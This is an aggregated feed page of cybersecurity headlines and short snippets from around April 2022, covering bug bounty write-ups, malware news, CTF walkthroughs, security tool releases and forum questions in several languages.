    借壳防病毒软件,SharkBot银行木马在Google Play传播
    CPR团队研究人员在Google Play 中发现了几个恶意 Android 应用伪装成防病毒软件,用于传播 SharkBot 银行木马。
  • Open

    The Hacker Playbook 3, ¿sigue siendo relevante?
    Si has leído libros técnicos sobre ciencias de la computación sabrás que estos tienen la desventaja de volverse obsoletos bastante rápido… Continue reading on Medium »
  • Open

    NSFW. folders by year-month. random pics met-art ftv etc.
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    Exploiting BITB with advanced open redirect
    BITB, despite being old, is only being popularly known now, so I will briefly explain what it is, whoever knows, can jump from this to the… Continue reading on Medium »
    There’s $20 up for grabs in this post
    I have been hosting a challenge for my readers with a reward of $20. No one has claimed it yet, the prize is still up for grabs. Continue reading on Medium »
    Running Decentralized, and Community Oriented Bug Bounties
    Bug bounties are not a new thing, but web 3 has challenged security trends, expanding project’s needs, and creating a deep desire for… Continue reading on Medium »
    Exposing Thousands of Indian Railways Outlets’ private data.
    Don’t just use the features, try to exploit them. — Unknown Continue reading on Medium »
    Privacy Disclosure on Facebook Lite after Creating a Post
    Hello, Continue reading on Medium »
    Complete Guide To Start Bug Bounty In 2022
    Hey Everyone ! Today we learn how you can start your bug bounty journey and how you can make a successful bug bounty hunter ! Continue reading on InfoSec Write-ups »
    shonydanza-a-customizable-easy-to-navigate-tool-for-researching-pen-testing-and-defending-with-the-p…
    Continue reading on Medium »
    crawpy-yet-another-content-discovery-tool
    Yet another content discovery tool written in python. Continue reading on Medium »
    4-zero-3–403–401-bypass-methods-bash-automation
    >_ Introduction Continue reading on Medium »
    Wordlistgen — Quickly Generate Context-Specific Wordlists For Content Discovery From Lists Of URLs…
    wordlistgen is a tool to pass a list of URLs and get back a list of relevant words for your wordlists. Wordlists are much more effective… Continue reading on Medium »
  • Open

    How does forcing the user to re-login every couple hours help a web app security?
    At work we have an internal web app. every about 2 hours the app will automatically log you out (even if you were using the app continuously non stop during that period). I asked why so and the answer was : it is a policy forced by higher security authorities in the organization. all computers at work go to sleep in 10 minutes if not used and require entering the password. the question: how does forcing the user to re-login every so often help in web app security? submitted by /u/esamcoding [link] [comments]
    List of protocols that are using TLS & their well known ports?
    I'm looking for (or trying to compile) a list of protocols that are using TLS (implicit, not via STARTTLS), including their well known ports. Like... https: 443 smtps (implicit): 465 imaps: 993 pop3s: 995 ldaps: 636 ftps (implicit): 990 telnet over TLS: 23 and 992 MS Global Catalog SSL 3269 What other protocols belong to this list? Edit: Adding new ports as they are being mentioned. submitted by /u/e_hyde [link] [comments]
    Is it possible to provide incorruptible integrity without authentication?
    Say I want to send a message and prove integrity without worrying about authentication or confidentiality. Is this theoretically possible? From my understanding authentication is sort of a by product of most popular integrity schemes. I'm new to this so sorry if this is a super obvious question. EDIT: Better formulated: "is there a way to send a message over an insecure channel, where integrity is guaranteed but confidentiality or authentication are not". My understanding is no, since you'd have to encrypt the hash which would require a symmetric or asymmetric key exchange which would provide authentication. I understand now that the answer is definitely "no" submitted by /u/jacobjr23 [link] [comments]
    Readings Topic Recommendations Wanted
    Hey guys, I want some advice on a reading list of topics as a junior pentester. I've done a couple of certs, including the OSCP, but I feel that I need to learn the foundational knowledge of things like networks and services, so I can start strong. What topics do you guys feel that every pentester should know outside of a CTF-esque environment? Thanks in advance submitted by /u/lifeover9000 [link] [comments]
    Does anyone else find this meterpreter sessions on his system?
    Hi, when I scan my PC with Antipwny this comes up. Can anyone confirm if their chrome or NordVPN also has open Meterpreter sessions? Also any tips on how to proceed with this? submitted by /u/Sudden-Pin-9480 [link] [comments]
    Phishing URL detection system?
    as my final year project I'm doing phishing URL detection system using deep learning. I started it as a research and to provide a product I'm working on to deploy models using flask(simple web application). because I thought when it comes to phishing attacks URLs have significant role to do. First model was created using NLP(natural language processing) and to train it I used LSTM. second model was created using feature based processing. I read some research papers and extracted simple features which I can work with( ex - if domain include '@' sign that can be a phishing URL. so giving values as '1' for those). NLP based model gave me around 97% accuracy and feature based model gave me around 88% accuracy. but when I try those models with new URLs ( that I didn't take to train the models) it doesn't give me the results as I expect. is there any solution for that. overall I'm asking is my project good enough. what are your ideas to improve it more. any idea that you guys have will be helpful. thank you <3 submitted by /u/lowiqstudent69 [link] [comments]
    Anyone have experience building a Windows AD lab environment in Docker?
    Goal The closest thing I've found to what I'm attempting is this stream. From the description: It is common for people to use spare hardware switches, routers, firewalls, and servers. For years, I used VMware workstation on desktops with multiple SSDs and lots of RAM so I could simulate a dozen VMs. But is there an easier way? Can we simulate hundreds of systems on a desktop. With Docker, I think we can. - cyberlibrarian However, this video was only a rough guide, as far as I can tell the code wasn't published, and only the early networking setup is covered. Context Our org doesn't provide the kind of lab we need so we've been trying to set up an AD testing environment on a hobbyist budget. And that's a low-end (enlisted / E4 pay) "hobbyist budget" not an "I make 6 figures" hobb…
  • Open

    THM: Attacktive Directory
    In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing… Continue reading on InfoSec Write-ups »
    [HTB] Jerry — Walkthrough w/o Metasploit
    Estamos aqui desta vez para falar da Jerry, uma máquina Retirada e de fácil resolução no HTB, porém que pode nos trazer uma compreensão… Continue reading on Medium »
  • Open

    Threat Actor Profile - FIN7
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    War in Ukraine / April 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Useful and interesting webinars
    Continue reading on Medium »
    Good News Roundup: a KBJ-inspired Geek edition
    This week we celebrate Judge Ketanji Brown Jackson’s historic confirmation to the Supreme Court, OSINT wins for Ukraine, and more geek… Continue reading on Medium »
    SPY NEWS: 2022 — Week 14
    Summary of the espionage-related news stories for the Week 14 (3–9 April) of 2022. Continue reading on Medium »
    Use Android to hunt down Social Media accounts with SHERLOCK
    About — Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It… Continue reading on Medium »
    OSINT With Buscador
    OSINT stands for Open Source Intelligence and is the practice of scraping the internet for publicly available information. This… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #31] Add Six, Update Two 🪴
    컬리넌 로그 #31입니다. 이번에는 변동사항이 좀 많습니다. 신규 항목 6개 추가하였고 Path traversal, SSRF에서 일부 내용을 추가했습니다. 지금 추가하려고 작성중인 항목이나 눈에 보인 항목들이 많아서 아마 당분간은 이것저것 업데이트하게 될 것 같습니다. Add OAST Add Threat Modeling Add Log Injection Add XSHM Add LaTex Injection Add Brute Force Update Path Traversal #RCE with log poisoning Update SSRF #Bypass with AAAA Record 아 참 XSS는… 한번에 정리하기 많아서 좀 더 시간이 필요할 것 같네요 😵‍💫
  • Open

    Help understanding a small evtx file with 8 events.
    Hi community, I'm going through the EVTX ATTACK SAMPLES github repo, and I chose a random one from the Lateral Movement category. I opened the file which includes 8 events, and I can't really understand why this file would be considered suspicious (Link is below). Is this because the calc.exe? or it looks like pass the hash attempts? (logon type 3/key length 0). ​ If there is a resource that maybe explains the EVTX files in the repo - that would be great as a self learning tool but I could not find anything like that. Thanks in advance :) ​ https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_WMI_4624_4688_TargetHost.evtx submitted by /u/HeliosHype [link] [comments]
    Forensically investigating docx files
    I'm looking at a docx sent to me by a rising star colleague in another team. Unlike what they've sent me in other cases, the docx has had its metadata scrubbed in Word (i.e. 0 minutes editing for a 3400 word document). However they've somehow neglected to remove authorship IDs. One of the ids is the colleague, the other is 'admin'. Is there any way easy to determine if the document has an origin outside our org? We do have a pretty good culture here, and I'd really prefer being able to have a diplomatic solution supported by evidence. If I can take some meaningful points for discussion about information sharing to the other team that would probably be ideal but don't want to do this without having something more concrete than suspicions. I've tried looking through it in Python with ZipFile and XML, as well as with docx, but it doesn't give me much more information that I could use. I've used regex to pull all weblinks, and there's nothing beyond internal links and the usual fare of links to MS and standards orgs. About the only thing is that it has some unusual fonts listed that I'd not expect to see in Australia, but are maybe a standard rollout? i.e. a Cherokee and an East Asian font of some sort. If anyone has suggestions that would be great. If not, I might just have to have a slower chat up the chain and stop sharing our strategy documents for now. submitted by /u/horror4802 [link] [comments]
  • Open

    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on System Weakness »
    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on Medium »
  • Open

    IBM's public FTP server with manuals and marketing material and posters etc.
    ftp.www.ibm.com submitted by /u/ShipGiftsToTurkey [link] [comments]

  • Open

    The Journey to get “SQL Injection” at BluePay (BLUE Indonesia BluePay) — 2019
    Hello, In this article i want to share my experience getting SQL Injection on BluePay (BLUE Indonesia BluePay), I found this vulnerability… Continue reading on Medium »
    Android Pentesting Setup On Macbook M1
    Hello hackers, Continue reading on Medium »
    Subdomain Takeover and How the things evolved with Domain Verification
    It is possible that a successful execution of Subdomain Takeover will be critical in exploitation since an attacker will be able to carry… Continue reading on CodeX »
    โปรแกรมตามหา Bug ของ Axelar Network
    ภาพรวมของโปรแกรม Continue reading on Medium »
    Optimized DNS and HTTP Log Tool for pentesters
    eyes.sh 1.0.1 Continue reading on Medium »
    การอัปเดตความปลอดภัย LayerZero — เมษายน 2022
    สัปดาห์ที่ผ่านมาแสดงให้เราเห็นว่าไม่มีอะไรสำคัญไปกว่าความมุ่งมั่นที่จะประเมินและปรับปรุงการรักษาความปลอดภัยอย่างต่อเนื่องในพื้นที่นี้… Continue reading on Medium »
  • Open

    [HTB] Legacy — Walkthrough w/o Metasploit
    Legacy é uma máquina Retirada do HTB. E a primeira publicação desta página é referente a solução dela. Continue reading on Medium »
    Office Multiple Search Order DLL Hijacking
    by: Tamir Yehuda(Tamirye94), Hai Vaknin(vakninhai), Noam Pomerantz, Hoshea Yarden, Ben Amar and Roy Kopit Continue reading on Medium »
  • Open

    Filipino OPM karaoke files?
    Is there a way to download OPM karaoke songs? I tried to search and download the whole magic sing archive but I could not find one. submitted by /u/Sabtreal23 [link] [comments]
  • Open

    Firewall analysis: A portable graph based approach
    submitted by /u/DiabloHorn [link] [comments]
    socialhunter: crawls the website and finds broken social media links that can be hijacked
    submitted by /u/utku1337 [link] [comments]
    Wrote about Azure AD Consent bypass - disclosure
    submitted by /u/jsantasalo [link] [comments]
  • Open

    Tools for Decoding MP3 Steganography
    Any recommended tools for decoding MP3 Steganography that Linux and MacOS are supported? submitted by /u/KnowledgeMammoth1714 [link] [comments]
    Why shouldn't I trust Google Password Manager and Microsoft/Edge Password Manager? Aren't they supposed to be some of the most secure given that they are made by those two giant companies?
    I honestly find these two to have the absolute best seamless syncing and integration across ALL platforms (Android, iOS, MacOS, Linux, Windows). They just work so well and it's painless. They do what they should without any unnecessary bells and whistles: manage passwords. What I love about Google Password Manager is that it lets you encrypt your passwords with a custom passphrase that won't be the same as your Google password. Edge lets you choose a device-specific passphrase that prompts you to enter before auto-filling anything. Controversies and all the discussion about privacy aside, I tend to trust companies like Google and Microsoft in terms of security. Given that they both have to deal with things like HIPAA and FedRAMP as part of their cloud service, I just can't doubt their expertise in having excellent security practices. So why wouldn't I trust a service like Google or Edge for managing my passwords if: (1) I have a 36+ character password on my account, (2) use YubiKey, (3) always enable device-specific extra password for Edge / enable encryption with custom passphrase in Google Password Manager. I am only interested in simply storing my passwords. I NEVER trust any service with my credit card info or bitcoin wallet seedphrase. I already use KeePass on an air-gapped device for storing such data and I never store the database anywhere online. submitted by /u/egobamyasi [link] [comments]
    Automatically onboarding/offboarding employees/contractors
    Not sure if anyone has similar issues. My team has been using quite a few SaaS tools in our daily work. Every time a new employee/contractor comes, I need to manually add them to every software and I will need to remove them when they leave. I feel it is a waste of time to do it manually and it is possible I might miss some. Anyone has come across automation tools or scripts to make it less manual? submitted by /u/Calm_Scene [link] [comments]
  • Open

    Insecure Storage of Sensitive Information on lonestarcell.com server
    MTN Group disclosed a bug submitted by muhnad: https://hackerone.com/reports/1482830
    HTML injection through Invite Teammate email
    SecurityScorecard disclosed a bug submitted by cryptoknight028: https://hackerone.com/reports/1482057
    Folder architecture and Filesizes of private file drop shares can be getten
    Nextcloud disclosed a bug submitted by shakierbellows: https://hackerone.com/reports/1337422 - Bounty: $500
    Found Origin IP's Lead To Access To kraden.com
    Kraden disclosed a bug submitted by 4bhin8v: https://hackerone.com/reports/1531183 - Bounty: $100
    Host Header Injection leads to Open Redirect and Content Spoofing or Text Injection.
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1444675 - Bounty: $300
  • Open

    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
  • Open

    OSI MODEL
    FULL FORM OF OSI. if you want to know about full form of OSI and knowledge about the of OSI model then you are at right place. OSI full… Continue reading on Medium »
    War in Ukraine / April 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Find users of popular services by time and place…
    The following selection of services is designed to collect data about content (posts, photos, videos) posted at a specific point in time… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Brute Force
    🔍 Introduction Brute Force 공격은 지정된 wordlist 또는 문자 패턴을 기반으로 반복적인 웹 요청을 발생시켜 보안적인 문제를 만들어내는 공격 기법입니다. 이러한 개념은 Fuzzing과 유사하나 Fuzzing은 잘못된 형식을 데이터를 보내 서비스의 결함을 유도한다면, Brute force는 Password에 대한 공격과 같이 허용된 값을 찾기 위해 다수의 데이터를 보내는 방식입니다. 암호학에선 특정한 암호를 풀기 위해 가능한 모든 값을 대입하는 것을 의미합니다. 🗡 Offensive techniques Testing method Brute force는 보통 brute force 또는 fuzzer를 이용하거나 따로 스크립팅하여 테스트합니다.
    Context Technology로 ZAP 스캔 속도 올리기
    ZAP의 Context(Scope)에는 Technology 라는 항목이 존재합니다. 이는 Context > Technology 경로에 존재하며 자세히 살펴보면 DB, Language, OS 등 여러가지 Technology 리스트와 체크박스가 존재합니다. 기본적으로 전부 체크되어 있습니다. 그럼 용도가 무엇일까요? 단순히 서비스에서 사용되는 기술을 작성하는 걸까요? 물론 그건 아닙니다. 이 Technology 항목은 ActiveScan 과 밀접한 영향이 있습니다. 하나 예시로 ActiveScan Rule의 SQL Injection 부분의 코드를 보면 이유를 알 수 있습니다. 코드 내 Tech.MySQL, Tech.MsSQL 같은 인자 값들이 존재하는데, 이게 바로 ActiveScan Rule과 Technology와의 매핑을 위한 값입니다.
    LaTex Injection
    🔍 Introduction LaTex는 TeX 문법을 사용하는 typesetting system 으로 이를 처리하는 시스템에서 TeX 문법을 주입하여 공격자가 원하는 액션을 처리하도록 유도하는 것으로 LaTex Injection이라고 합니다. TeX는 수학의 수식 등 특수한 형태를 띄는 글자를 쉽게 입력하고 사용하기 위한 문법으로 컴퓨터로 문서 작성을 위해 많이 사용되고 있습니다. 자세한 내용은 wikipedia의 TeX 문법 페이지를 보면 대략 어떤 내용인지 이해가 가능합니다. Example 1 \frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx 🗡 Offensive techniques Detect 일반적으로 파일 변환 관련 기능에 존재할 가능성이 높습니다.
  • Open

    GCFA examination
    I recently took the SANS FOR500 class and passed my GCFE at 86%. Next up is the FOR508 and GCFA exam. Reaching out to the community to see if anyone has some insight into how the 2 exams compare and if I should expect to put more into the GCFA exam then I had to with the GCFE or if I index and study the same amount as it took me to pass the GCFE at 86%, do you think I’ll be fine with the GCFA? I’ve seen some previous posts here indicating the GCFA is difficult. Thanks ahead of time for any pointers and feedback! Edit: before anyone points it out, I realize the content of the exam will be different, just wanting know if anyone has some experience with how they compare in terms of preparation and time commitment. Also, in case this helps. I’m not required by my job to have these certifications. I’m just fortunate enough to have been given the opportunity to take those courses and certifications and would rather pass them, although it isn’t a requirement. submitted by /u/Ckn0wt [link] [comments]
  • Open

    文件上传之.htaccess的一些技巧
    .htaccess是一个配置文件,用来运行Apache Web Server的Web服务器。
    wireshark抓包,丢包分析?
    如果抓的pcap丢了包,会影响最终安全测试的效果。
  • Open

    New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns
    A new version of SolarMarker malware appears to upgrade evasion abilities and demonstrates that the infostealer and backdoor continues to evolve. The post New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns appeared first on Unit42.

  • Open

    Discord Group for Cybersecurity jobs.
    I made a Discord for people who are looking to build their careers into Cyber Security. https://discord.gg/tMwHKufn submitted by /u/Shazeb02 [link] [comments]
    Which vulnerability in ASUS routers was exploited to install the Cyclops Blink malware?
    So I've read the report by Trend Micro and the analysis by UK NCSC. They explain how it acts and becomes persistent, but nowhere I can read which vulnerability was exploited to actually install the malware in the first place? ASUS says in it's statement: Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings. So one can only guess that there is/was an easy exploitable vulnerability in the remote access function? submitted by /u/ogiakul [link] [comments]
    Print full lines on match in Yara
    How can I have Yara print the full lines for any line found matching a Yara rule. By default it will only print the string found and not the full line the string was found in, and I don't see an option to do that. submitted by /u/ZappaBeefheart [link] [comments]
    Sysmon Tuning Help - Event ID 7 - Image Loaded
    I'm trying to wrap my head around logging for Event ID 7 - Image Loaded events - notoriously a noisy one but obviously a lot of value there. Hoping someone out there has gotten pretty intimate with logging and tuning this particular ID. What approach have you taken towards tuning? There's just a ton of processes in the environment that are always loading .dll's all over the place and I don't have a detailed understanding of the avenues for exploitation here. If I exclude a Image and ImageLoaded combination because it generates a lot of noise, what about that one time an adversary is able to swap in a malicious .dll for the one that is normally legitimat? Or is the idea to catch something loading an image from a location it does not normally load from? One suggesting from the logging cheat sheet is to consider only logging events where the image is unsigned, but you may miss an event where an adversary is able to load something that appears signed but is not. submitted by /u/IHadADreamIWasAMeme [link] [comments]
    20YOE Staff+ Software Engineer at a FAANG. Been interested in netsec since I was a kid. Should I switch? CAN I switch?
    I used to wardial. I used to "creatively" use VMBs to make free international phone calls. I ran a hacker BBS from '94 to '99. I went to my first DefCon before the year 2000. I phreaked. I wrote my first code at four years old on a computer with sixteen kilobytes of RAM and was cracking software when I was eleven (and was dumb enough to put my real name on the title screen...). I used to be an op on #hack and #2600. I've read every volume of TCP/IP Illustrated cover to cover and still remember what each bit does in an IPv4 datagram. I remember when the early issues of Phrack went out and there were so many copies being sent that it would routinely slow down mail delivery across the entire internet. Basically, I love this shit. At the same time, I get an utterly ridiculous amount of money …
    What would be the best certification to get first?
    I wanted to learn coding, so I started at html and css and then I decided that cyber security was really sounding interesting so I started learning python, I am currently taking, Angela yus 100 days of code, course on udemey. I was considering doing a cyber security bootcamp at a college near by, but I heard that boot camps are kinda a waste of money. So I want to be able to get something on my resume to be able to get a job. It seems like certifications are the best way of doing that. I want to know which certification would be best bang for the buck. Which certification would look really good on an application that is also not to complicated for beginners. submitted by /u/bluntsmoker_420 [link] [comments]
    Getting into scripting Zeek vs Python
    I'm trying to get more insight into scripting for networking security purposes. Does anyone have a preference of using zeek vs python? Should I learn python before zeek? Is there anything more beneficial of using one language vs the other? Thanks! submitted by /u/alkior70 [link] [comments]
  • Open

    carpunk-the-car-hacking-toolkit
    CARPUNK IS VERY SIMILAR TO CANghost, ONLY THE DEFFERENCE IS, IT COMES WITH OPTIONS TO ENABLE OR DISABLE INTERFACE AND BASIC SNIFFING AS… Continue reading on Medium »
    Scrummage — The Ultimate OSINT And Threat Hunting Framework
    VERSION 3.6 Continue reading on Medium »
    smersh-a-pentest-oriented-collaborative-tool-used-to-track-the-progress-of-your-companys-missions
    Smersh is a pentest oriented collaborative tool used to track the progress of your company’s missions and generate rapport. Preview front… Continue reading on Medium »
    af-shellhunter-auto-shell-lookup
    AF-ShellHunter: Auto shell lookup Continue reading on Medium »
  • Open

    Exploiting a User-After-Free on PHP to bypass disable_functions
    submitted by /u/gid0rah [link] [comments]
    Microsoft Trusts the Client! Simple Bypass for the Defender for Cloud Apps Proxy
    submitted by /u/BugroSoft [link] [comments]
    Russia’s certificate authority for sanctioned organizations
    submitted by /u/koenrh [link] [comments]
    ImpressCMS: from unauthenticated SQL injection to RCE
    submitted by /u/eg1x [link] [comments]
    Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms
    submitted by /u/EnableSecurity [link] [comments]
  • Open

    Ukraine — Point de situation au 9 avril
    Les dernières 24h Continue reading on Medium »
    MY EXPERIENCE AS A JUDGE ON TRACELABS CTF SEARCH PARTY 2022
    This was my first year being a judge in the Tracelabs CTF search party competition. To be able to fully judge the submissions that came in… Continue reading on Medium »
    War in Ukraine / April 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Helping the investigative reporter…
    Save is an easy-to-use app designed to help you store, share and enhance your mobile media while protecting your identity. for iOS… Continue reading on Medium »
    My cryptocurrency investigation toolkit…
    Hello! I tried to collect most of the sources in one collection, ranging from blockchain explorers, universal explorers (allowing you to… Continue reading on Medium »
  • Open

    【安全通报】VMware 官方修复多个 Workspace ONE Access 漏...
    近日,VMware 官方发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(C...
  • Open

    【安全通报】VMware 官方修复多个 Workspace ONE Access 漏...
    近日,VMware 官方发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(C...
  • Open

    Permissions-Policy 헤더로 조금 더 안전하게 Browser API 사용하기
    오늘은 Permissions-Policy(구 Feature Policy) 헤더에 대해 잠깐 이야기할까 합니다. Permissions-Policy Permissions Policy는 Feature Policy는 라고도 불리는 보안 정책 헤더이며 개발자가 다양한 브라우저 기능 및 API의 사용을 선택적으로 활성화 및 비활성화할 수 있는 메커니즘을 정의합니다. 전반적인 동작 방식은 CSP(Content-Security-Policy)와 유사합니다. 다만 CSP가 통제하는 성향의 정책이라면 Permissions Policy는 기능을 제어하는 정책입니다. 참고로 여기서 말한 기능이란 카메라, GPS와 같이 브라우저의 기능들을 의미합니다. 문법은 CSP와 동일하게 directive와 allowlist로 명시합니다. Permissions-Policy Permissions-Policy: directive=(allowlist), directive=(allowlist)
    XSHM (Cross Site History Manipulation)
    🔍 Introduction XSHM (Cross Site History Manipulation)은 사용자의 브라우저 히스토리를 이용한 공격 방법으로 단순히 이전 history를 변경하여 공격자가 의도한 페이지로 이동되도록 하는 피싱 방법부터, SOP를 우회하거나 CSRF 또는 IFRAME을 이용하여 중요 정보를 탈취하는데 사용할 수 있습니다. https://developer.mozilla.org/en-US/docs/Web/API/Window/history https://developer.mozilla.org/en-US/docs/Web/API/History 다만 history를 변경할 수 있었던 부분은 1 2 history.pushState('','','https://www.hahwul.com/fafa') history.replaceState('','','https://www.hahwul.com/z') 🗡 Offensive techniques Detect 해당 공격 방법은 단독으로 동작한다기 보단 XSS나 업로드된 파일 등 공격자가 통제할 수 있는 페이지에서 스크립트 삽입이 필요합니다.
  • Open

    SecWiki News 2022-04-08 Review
    通过覆盖Powershell cmdlet方式进行权限维持 by 风迷 漂亮侧信道:从timeless attack到pipeline的放大攻击 by ourren MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-08 Review
    通过覆盖Powershell cmdlet方式进行权限维持 by 风迷 漂亮侧信道:从timeless attack到pipeline的放大攻击 by ourren MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren 更多最新文章,请访问SecWiki
  • Open

    The Case for 2FA by Default for WordPress
    Administrator panel compromises are one of the most common attacks that everyday WordPress website admins face. We work with thousands of clients who have encountered attacks on their websites and I’ve long ago lost count of the number of times that I’ve told clients that the point of entry was their WordPress login page. Brute force attacks and compromised administrator users are overwhelmingly the most common attack vectors for the CMS platform, which as of 2022 makes up over 40% of the entire web. Continue reading The Case for 2FA by Default for WordPress at Sucuri Blog.
  • Open

    Timestomping Registry Keys
    If you're worked in DFIR or threat intel for any amount of time, you've likely either seen or heard how threat actors modify systems to meet their own needs, configuring systems to provide data or hide their activities, as they make their way through an infrastructure. From disabling services, to modifying the system to maintain credentials in memory in plain text, to clearing Windows Event Logs, sometimes it seems that the threat actor knows more about the platform than the administrators. These system modifications are used to either provide easier access to the threat actor, or hide the impacts of their activities by "blinding" the administrators, or simply be removing clear evidence of the activity. Sometimes these system modifications go beyond the administrators, and meant to instead…
  • Open

    Binary Exploitation (Pwn) Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    FreeBuf 早报 | FIN7 成员被判5年有期徒刑;全球供应链攻击2021年下半年激增51%
    网络犯罪组织FIN7的高级成员Denys Iarmak于当地时间周四被一名美国法官判处五年监禁。
    零时科技 | APE 攻击事件分析
    攻击者可以通过闪电贷兑换 NFT 来获取 APE 空投,再将 NFT 铸币归还闪电贷会对项目造成威胁。
    首个针对AWS Lambda无服务器平台的恶意软件出现了
    该恶意软件使用更新的命令和控制流量地址解析技术,以规避典型的检测措施和虚拟网络访问控制。
    FIN7 黑客组织成员被判处 5 年有期徒刑
    一名 FIN7 黑客组织渗透测试员因窃取信用卡信息,被判处 5 年监禁。
    FreeBuf甲方群话题讨论 | 聊聊企业API安全
    不安全的API已成为网络攻击者的主要目标之一,我们应该如何规避?相对安全的API又应该是怎样的?
    俄罗斯石油巨头Gazprom Neft网站因遭黑客攻击而关闭
    俄罗斯国家天然气公司Gazprom的石油部门Gazprom Neft网站因遭黑客攻击而被迫关闭。
    谷歌通过新的开发策略以提高Android安全性
    4月6日,谷歌宣布了针对 Android 应用程序开发人员的几项关键政策更新,以提高用户、Google Play 和相关应用程序的安全性。
    FreeBuf周报 | 三星手机曝重大漏洞;福克斯新闻泄露 1300 万条数据
    福克斯新闻泄露 1300 万条数据,包含员工信息。
    全球高级持续性威胁(APT)2021年度报告
    北京地区以及广东、福建、浙江、江苏等沿海省份作为我国政治中心、经济发达地区,是境外APT组织进行网络攻击的主要目标地区。
    多重监管之下,谁还在“挖矿”?
    自2021年以来,针对虚拟货币“挖矿”的监管持续加码的情况下,谁还在挖矿?
  • Open

    Movies and assorted stuff.
    submitted by /u/omnifage [link] [comments]
  • Open

    Duqu malware | Cybersecurity
    submitted by /u/OkFaithlessness2414 [link] [comments]
    Any good threat hunting resources? Looking for query libraries.
    Currently using Sigma and Microsoft query libraries. New to threat hunting, and looking to learn more about resources that are out there. Thanks. submitted by /u/haloman882 [link] [comments]
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview

  • Open

    PCI DSS v4.0 Resource Hub
    submitted by /u/Pomerium_CMo [link] [comments]
    fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
    submitted by /u/mazen160 [link] [comments]
    Denonia: The First Malware Specifically Targeting Lambda
    submitted by /u/lormayna [link] [comments]
    SpiderFoot 4.0 release - introducing YAML correlation rules
    submitted by /u/smicallef [link] [comments]
    Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
    submitted by /u/alt3kx [link] [comments]
  • Open

    记一次hackmyvm综合靶场的渗透测试-helium
    本靶场内容过于真实,仅用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    FreeBuf 早报 | 谷歌下架数款收集用户数据的应用;蔚来员工被曝利用公司服务器挖矿
    据称,涉事人是蔚来汽车员工,此前担任某集群服务器管理员。在职期间,利用职务上的便利,用公司服务器挖虚拟货币。
    Cash App数据泄露恐将影响820万美国用户
    近日,美国支付巨头Block披露了一项与投资应用Cash App有关的数据泄露事件,并将此事件告知了其820万美国用户。
    VMware 多个产品中爆出严重漏洞
    VMware 多个产品中存在关键漏洞,攻击者能够利用这些漏洞发起远程代码执行攻击。
    南非和美国调查人员联手突袭BEC诈骗团伙
    南非和美国调查人员联手逮捕了和臭名昭著的尼日利亚商业电子邮件诈骗(BEC)集团相关联的数名诈骗团伙成员。
    值得警惕!新型恶意软件FFDroider正对 Facebook等社交帐户下手
    Zscaler的研究人员表示,该恶意软件通过窃取存储在浏览器中的凭证和 cookie 以劫持受害者的​​社交媒体帐户。
    BruteXSS:XSS暴力破解神器
    本文介绍了一款自动进行插入XSS,并且可以自定义攻击载荷。
    Android平台渗透测试套件zANTI v2.5发布(含详细说明)
    zANTI是一款Android平台下的渗透测试工具,支持嗅探已连接的网络、支持中间人攻击测试、端口扫描、Cookie获取及路由安全测试等操作。
    神器Nmap web版:Rainmap Lite
    Nmap对应Web应用程序Rainmap Lite,允许用户从手机/平板电脑/网络浏览器启动Nmap扫描!
  • Open

    Ukraine — Point de situation au 8 avril
    Les dernières 24h Continue reading on Medium »
    Утиліти консолі Linux для мережевої розвідки доменів
